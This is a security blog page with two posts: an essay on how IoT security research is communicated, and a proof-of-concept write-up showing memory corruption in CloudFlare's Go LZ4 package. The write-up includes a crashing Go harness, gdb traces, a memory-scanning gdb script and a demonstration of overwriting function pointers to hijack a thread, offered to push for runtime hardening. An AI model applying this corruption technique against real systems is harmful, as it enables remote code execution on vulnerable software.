As it happens, Lab Mouse is running a special discount on threat modeling and architecture security engagements for start-ups and small businesses! If you're in need of security services, please reach out! I will be happy to provide you with a valuable engagement that scales according to your budget. 

Best wishes,
Lab Mouse Security

Tuesday, September 23, 2014

No Thing Left Behind

You're Damn Right

Adorable Crochet Puppy Mauls Researcher

Most of what we've heard about the Internet of Things (IoT) has been pushing fear, uncertainty, and doubt with regard to security. But, the effect has not been an improvement of security! Rather, the result has been fear that information security researchers aren't taking the time to look at the actual threat surface affected by the device(s) they analyze. Uncertainty regarding what direction engineers should take in order to solve realistic IoT security concerns. And doubt as to whether the talking heads driving the industry conversation are basing their perspectives on any semblance of reality what-so-ever. In effect, the Internet of Things landscape looks much like a foggy moor with Dracula hovering menacingly over a bubbling bog. The reality, however, is quite the contrary. Internet of Things security is about as terrifying as Grayson the Vampire Puppy whose cute and cuddly fangs will snuggle their way into your palpitating heart. 
Grayson Will Stare Deep into Your Void, Researcher Soul

Lead Your Flock

My biggest concern with the current conversation about IoT has nothing to do with Dave's concerns. While his concerns are valid, I don't have to sit around reading CFP submissions for Infiltrate and SyScan. Though hacking some random device has value, it has less value than it did four years ago. This is not to invalidate the work people are putting in to getting up to speed. This is commenting on the structure of our industry. If we look at the industry from a scientific perspective, we need only take enough samples to identify patterns of behavior. In IoT, we have established not only patterns of behavior, but we have identified substantial models in which the Things exist. So, at some point, we should move on from hacking things to solving models. Instead of breaking down hardware just to score a point on the information security conference scene, we should be holding the hands of these devices as they prepare to enter the brave new world they're designing for us. 

Off to School, Little Guy
This year at Black Hat, Zach Lanier and I (Don A. Bailey) started this very conversation by getting people to talk more about the models than the devices.  This was reinforcement of the ideas I set forth at the CyberHive Securing the Internet of Things: Masters dinner, where I presented on this very concept just prior to Black Hat. The only way we can move forward as an industry is if we start talking about the correct models in IoT, the realistic risks associated with the models, and practical ways to mitigate these risks. 

The Butt Dance 

Another major concern is the platform upon which people speak. I am of the belief that everyone, an I do mean everyone, has value to bring to a community. Agreeing or disagreeing with a person or a perspective is often moot. What is important is whether people's opinions are heard, and a consensus is achieved as to whether or not the opinion has merit. For this to work, opinions must be presented with facts or some semblance of research to support the opinion as more than subjective rantings. That said, we also live in a highly competitive world, and an even more competitive industry. I get it. We all want to be the best at all the Things. That's fine. 

But, when one or a few of us decides to be the mouth piece for the industry, they better have their shit together. There are a few things wrong with being a talking head without a body. Without an appropriate and well-researched technological platform on which to stand, a mouthpiece is spouting nothing anyone wants to hear. This is because the intentions are coming from a heart warming, fuzzy, and Care Bear Stare place of good will, but the words are jumbled and juxtaposed webs of bullshit that look like something a spider might spin on copious amounts of drugs

Charlie Can Serve It Up
People aren't stupid. Engineers aren't stupid. Project managers and product drivers are not stupid. They might not be as technically capable as a security researcher, but they understand the technology and business risks. What they often lack in is the ability to prioritize threats according to probability of abuse, and couple those prioritized concerns with tangible, practical, and cost-effective solutions. That's our job, to bridge that gap. If we waste their time with hyperbole, they will realize that we're full of shit and look for solutions elsewhere. This helps no one and distills a significant and imperative message of security down to what is essentially a Butt Dance: people think you're either insulting them, or yourself, but they can't tell which. That's a problem. 

IoT: The Next Generation

Take a break. Let's stop acting for a moment and take a break. Put down the Saleae Logic analyzer. Put down the oscilloscope. Put down the multi-meter. Let's circle back as an industry and get our message right. There's a whole world out there of product owners, engineers, lawyers, and politicians, that are willing to help build and enforce security. But, in order to make it happen we need a cohesive message. 

Delicious Breaks...
As a result, there are a few rules that need to be adhered to. These aren't my rules. They're really just common sense points that should be emphasized. 

For Speakers

  • Debugging is not a hack
  • Sunlight shining down on garbage don't make garbage smell sweeter
  • Trust is built by new research, not describing the wheel
Telling hardware, firmware, or software engineers that using interfaces specifically designed to analyze or alter code is a hack, is really a poor attempt at hacking humans. You're trying to convince someone that you performed a significant attack by doing something that the device or interface was designed to do. This is universally ridiculous, an is essentially insulting your potential customer. Sure, they might need to disable debugging capability in production level devices, but do they need to? What's the true risk to the business or to the end-user if debugging capability is left enabled? Every device has a different threat surface. Identify whether this even falls into the category of reasonable risk. 
Ricky Understands Metaphors

There's a famous saying in the south about sunlight never sweetening garbage. It essentially means that no matter what light you shine on a certain topic, you'll never frame that topic in a way that makes it seem desirable. This is the case with presenting an attack from the perspective of the wrong threat model. For example, I recently had a discussion with an individual that couldn't get beyond the use of Zigbee in a home product. They were absolutely infuriated that this product used Zigbee because of "all the security risks" with the Zigbee product. Sure, Zigbee has issues, but are those issues in scope? Their perspective was that Zigbee was a serious problem because it "makes everything critically vulnerable". But, they completely hand-waved over the fact that the risk can't be abused remotely. So, sure, you might be able to break the crypto key in a reasonable amount of time for every single instance of this particular device. But, you'd have to figure out how to do it at each instance's location. This means you'd need a secondary (or more) set of attacks to even get to the Zigbee layer, or be on site at every attack location. This is not a realistic attack! Sure, you'll get some laughs at a conference about how Zigbee can be broken if the crypto is weak, but you're not really breaking the IoT device at that point. You're just breaking Zigbee. So, talk about Zigbee and be done with it. Oh, Zigbee talks have already been done? Whoops. 

And since you're not in the business of reinventing the wheel, why do something someone else has already done? Break new ground! That's why we're here, right? Scanning the Internet for VNC ports may not be a valuable use of your time when instead you could have said "hey, let's try and push for standards and legislation that enforces ISPs to restrict access to critical ports unless subscribers explicitly ask" or some such variation. More importantly, what if the real research focused on how embedded photovoltaics systems are being designed with VNC enabled by default in some models. Wouldn't it be more useful to talk about the specific issues, and assist those companies with engineering to help diminish the problem at the source, rather than shaking a finger at the aftermath while using the same finger to point every would-be attacker in the direction of all the vulnerable things? Yeah. 

Not one bit.

For Talking-Heads

  • Your job is to get us through the golden gates
  • Never build a house on sand
  • Kiwis can't fly, and they don't tell people they can
The number one job of a talking head is to open doors and burst through gates. Often times technical researchers don't have the time or negotiating skills to get in the right places to effect change at high levels. The talking head is designed, through evolution, for this specific goal. But, if the talking head presumes he or she can fulfill the role of a technical researcher once through those gates, they risk losing the ear of the audience in the secret rooms and clubhouses of the elite. You cannot afford to lose the contacts you've just made by augmenting your verbiage with less-than-honest technical details. Someone will notice, and you'll be excommunicated from those golden halls. Accept your position at being, essentially, a politician. A politician's job is to speak the word of their constituent. In this case, it's the voice of the technical community. Be the channel from which the technical community speaks to the executive decision makers of the world. Only together can you facilitate action. Separately, the story becomes imbalanced and full of holes that even non-technical people can identify quickly. 

Building a house on sand is the same as making technical presumptions without the technical or engineering experience to know they are true. A great example of this is Karsten Nohl's brilliant work on USB hacking. The attack works because removable devices have no trust mechanism, regardless of what type of device they are. Seeing a USB mouse is believing the device is a USB mouse. But, anyone that has ever written firmware (especially for a USB module) knows that the firmware can be written on a generic module, and the firmware can be any type of USB device it wants to be. Without the technical details, the attack surface will look like "what if someone uses this mouse while you're gone to click on a administrative interface" when the real attack surface may be "this mouse can detect when it has been idle for over 5 minutes, and will then switch to a USB network dongle and hijack your DNS". Without accurate technical details you can't facilitate proper mitigation, which will cause high level decision makers to kick off initiatives with poorly designed scope. High level initiatives may take years to adjust if they aren't formulated accurately. Think about how long it took to integrate proper security engineering into Microsoft's SDLC. This was a result of a model that incorrectly dealt with security gaps and needed to be adjusted over time to accommodate for existing infrastructure and personnel. 

Finally, and this is just reiterating the points made above, never tell someone you know something you don't. Jack Welch of GE fame was a brilliant business leader because he knew the value of his gaps in knowledge. Jack openly admits that his sole job was to hire people that were smarter than him to fill the gaps in his knowledge. This allowed him to run GE with not only an iron fist, but an iron mind. He had the support of his employees, because they knew he put his trust into them to advise him. Use the technical research community in the same way. While none of us will want to be seen as your employee (unless we technically are) if you are presenting a message as a community initiative - not your own - the community will participate. 


We've got a long way to go with IoT. The technology is moving fast, but it's not a terror or a loss. In fact, it's getting better every day. Today, we have access to organizations like Bugcrowd and Hacker1 to facilitate crowd-scale security testing. We've got more researchers and white papers on security process than we can shake a stick at. We've got increasingly well engineered technology for deploying trusted hardware. Sure, it's not perfect, but we're light years beyond where we thought we'd be five years ago. 

So let's stop talking about how the world is burning, and start working together to put out the real fires. In other words, PoC||GTFO

Only You Can Save the World

Friday, July 11, 2014

Bla Bla LZ4, Bla Bla GoLang Or Whatever

I Was Coerced 

A lot of people don't know this, but I've known Jaime Cochran for almost fifteen years. We've been friends as long as I've been on the Internet. So, when she jabbed me earlier tonight saying "Hey, why the hell haven't you looked at GoLang yet?", my first reaction was obviously "Kiss off". My second reaction was "fine, I guess I should at least search around". 

As it turns out, CloudFlare (who I actually like quite a bit), has a vulnerable GoLang package on github that has been fairly popular. Last night I poked around a bit and got silly with the Go Stuffs. The result was the following source file:

package main

import (

func main() {
        input, err := ioutil.ReadFile("/home/x/lz4/go.lz4")
        if err != nil {
                fmt.Printf("failed: %#v\n", err)

        output := make([]byte, (17 * 1024 * 1024))
        err = lz4.Uncompress(input, output)
        if err != nil {
                fmt.Printf("failed: %#v\n", err)

Using this little beauty with CloudFlare's package resulted in the following Fun Times (TM). Note that I'm not even changing the contents of the payload, I'm only adjusting the offset a bit. More details on this later. 

donb@debian:~$ ./donblz4
fatal error: unexpected signal during runtime execution
[signal 0xb code=0x2 addr=0x2 pc=0x804bf11]

runtime stack:
runtime: unexpected return pc for runtime.sigpanic called from 0x804bf11
        /home/x/lib/src/go/go/src/pkg/runtime/panic.c:520 +0x71
runtime: unexpected return pc for runtime.sigpanic called from 0x804bf11
        /home/x/lib/src/go/go/src/pkg/runtime/os_linux.c:222 +0x46
... and so on ...

Well because I have had just about enough of this LZ4 hacking crap, I was ready to call it a night. But, Ben Nagy (who I once got drunk with in Singapore, surprise, surprise) asked me to investigate a bit further. Why? He's interested in using this as an example to push for GoLang run-time hardening. I'm Pro-Ben (I honestly haven't given much thought to run-time hardening in Go ;-)) so I figured I'd help out. 

I really have no idea whether people will care or listen to these details, or whether they'll even help with run-time hardening. But, what the heck, right? Let's try and Do Some Good, anyway. 

Quick and Dirty

So the point of this is not necessarily to gain RCE, but to prove that RCE is possible. This is because libraries like CloudFlare's LZ4 package, like the other tests I've been performing against LZ4, are out of application context. Because of GoLang's memory layout, I cannot (in this short amount of time) develop a guaranteed one-shot RCE like I can for Erlang and Python. 

But, attacking GoLang is much more profitable than Ruby. With Ruby, you never know where your memory chunk will end up in RAM and you never know whether there is a valid page prior to that chunk. In GoLang, things are much, much simpler. 

(gdb) where
#0  LZ4_decompress_fast (source=0x18336000 "\017", dest=0x19348000 "", outputSize=17825792)
    at /home/donb/go/src/golz4/src/lz4.c:823
#1  0x0804c212 in LZ4_uncompress (outputSize=, dest=,
    source=) at /home/donb/go/src/golz4/src/lz4.h:193
#2  _cgo_e56f7980f8b8_Cfunc_LZ4_uncompress (v=0xb7d3eea4) at /home/donb/go/src/golz4/lz4.go:50
#3  0x08072125 in runtime.asmcgocall () at /home/donb/lib/src/go/go/src/pkg/runtime/asm_386.s:624
#4  0xb7d3eea4 in ?? ()

After loading up 'donblz4' and breaking at LZ4_decompress_fast, the function called by the GoLang bindings, we see the above call trace. All we really need to look at is the variable dest, which identifies the address at which the decompression payload will be stored. This is the address from which memory corruption will occur. So, the most likely memory segment to corrupt will be the one this address resides in. 

Unlike Ruby, which uses Linux's standard glibc heap for new memory buffers/Objects, GoLang uses a completely separate memory segment. It creates a memory map that is Read and Write only. We can easily spot this by checking the process's memory mapping. 

(gdb) info inferiors
  Num  Description       Executable
* 1    process 8291      /home/donb/donblz4
(gdb) ^Z
[2]+  Stopped                 gdb -q donblz4
donb@debian:~$ cat /proc/8291/maps
08048000-0815f000 r-xp 00000000 fd:00 122015     /home/donb/donblz4
0815f000-0816f000 rw-p 00116000 fd:00 122015     /home/donb/donblz4
0816f000-081a4000 rw-p 00000000 00:00 0          [heap]
08200000-08205000 rw-p 00000000 00:00 0
08205000-17ec0000 ---p 00000000 00:00 0
17ec0000-1a500000 rw-p 00000000 00:00 0
1a500000-38302000 ---p 00000000 00:00 0

Obviously, the address at which dest points does not fall within the standard heap. As suggested above, there is an entirely separate memory chunk. What's great about this chunk is it isn't just allocated for our large LZ4 decompression payload. And, even if it were, it isn't the only type of data that lives there. 

Scanning around that chunk of memory we can easily determine whether function addresses reside here, and whether they will sit at predictable offsets in RAM. 

I generated a simple gdb script to identify addresses within memory that fit with the 'donblz4' executable regions

define scanlz4

        set $x = ($arg0)
        set $y = ($arg1)
        set $x_start = ($arg2)
        set $x_end = ($arg3)

        while $x < $y
                if *(unsigned int * )$x >= $x_start && *(unsigned int * )$x < $x_end
                        printf "%.08x: found value %.08x \n", $x, *$x
                set $x += 4


Using the above script, even for our tiny do-nothing test executable, revealed over 50 results within the same chunk of memory as our dest buffer. 

(gdb) scanlz4 0x183000e0 0x1a500000 0x08048000 0x0815f000
183000ec: found value 0807353a 
18300124: found value 080fa3b8 
18300144: found value 080fa3d8 
18300164: found value 080fa398 
18300184: found value 080fe278 
183020b8: found value 08072109 
183020d4: found value 08050a7a 
18302130: found value 08070be2 
18302298: found value 08051474 
183022b4: found value 08051474 
18302310: found value 0805cc20 
18302338: found value 0805f204 
183023b0: found value 08055ee0 
183023d8: found value 0805f204 
18302450: found value 08055ee0 
183026f8: found value 0805f4b0 
18302714: found value 0805f4b0 
18304004: found value 080f2880 
18304064: found value 080ecc81 

We can easily see that these addresses point to actual function addresses by inspecting the symbol at each offset. 

(gdb) x/8i 0x0807353a
   0x807353a :   pop    %ecx
   0x807353b :   pop    %ecx
   0x807353c :   test   %eax,%eax
   0x807353e :   jne    0x80735de
   0x8073544 :   mov    0x2c(%esp),%ebx
   0x8073548 :   mov    %ebx,(%esp)
   0x807354b :   mov    0x6c(%esp),%ebx
   0x807354f :   mov    %ebx,0x4(%esp)

So now that we know where a bunch of function addresses are, we can really just adjust the LZ4 payload I've been using in all of my blog posts to spam 0x11223344 at a chunk of memory that has a high concentration of known function pointers. 

Doing so demonstrates that these function pointers can be corrupted in a reliable fashion. What I end up controlling, however, are separate threads than the main one that LZ4 is executing within. In fact, the entire LZ4 payload hasn't even finished writing by the time the memory corruption triggers a SIGSEGV in another thread. 

(gdb) c

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb743bb70 (LWP 8295)]
0x11223344 in ?? ()
(gdb) info threads
  Id   Target Id         Frame
  4    Thread 0xb6c3ab70 (LWP 8296) "donblz4" 0x0804c00d in LZ4_decompress_generic (targetOutputSize=0,
    partialDecoding=0, prefix64k=1, endOnInput=0, outputSize=17825792, inputSize=0, dest=0x19348000 "",
    source=0x18336000 "\017") at /home/donb/go/src/golz4/src/lz4.c:759
* 3    Thread 0xb743bb70 (LWP 8295) "donblz4" 0x11223344 in ?? ()
  2    Thread 0xb7d3cb70 (LWP 8294) "donblz4" _fallback_vdso ()
    at /home/donb/lib/src/go/go/src/pkg/runtime/rt0_linux_386.s:21
  1    Thread 0xb7e4d6d0 (LWP 8291) "donblz4" _fallback_vdso ()
    at /home/donb/lib/src/go/go/src/pkg/runtime/rt0_linux_386.s:21

So, there we have it. Because the dest buffer resides in the same memory chunk as function pointers, and there are no guard pages to hinder memory corruption, I have the ability to overwrite objects in memory that affect other threads. 

All in all, this is pretty Good Times. I'm glad Jaime and Ben pushed me to bother with this because otherwise I would have just closed out with Erlang. Three remote RCE capable languages with LZ4 is pretty sick, though, and was deserving of my time. 


So now we know that RCE can be achieved in GoLang. However, there are caveats
  • Unlike Erlang and Python, memory layout isn't guaranteed
  • The entire "compressed" LZ4 payload may proceed anything important (must jump over)
  • This means that (for now) there is no universal one-shot exploit for GoLang via LZ4
  • A Function-Spray doesn't necessarily cause a SIGSEGV before the pointer is executed
  • This is sufficient evidence for improvement (hardening) of the GoLang runtime
  • CloudFlare, please update your LZ4 repo
Don A. Bailey
Founder / CEO
Lab Mouse Security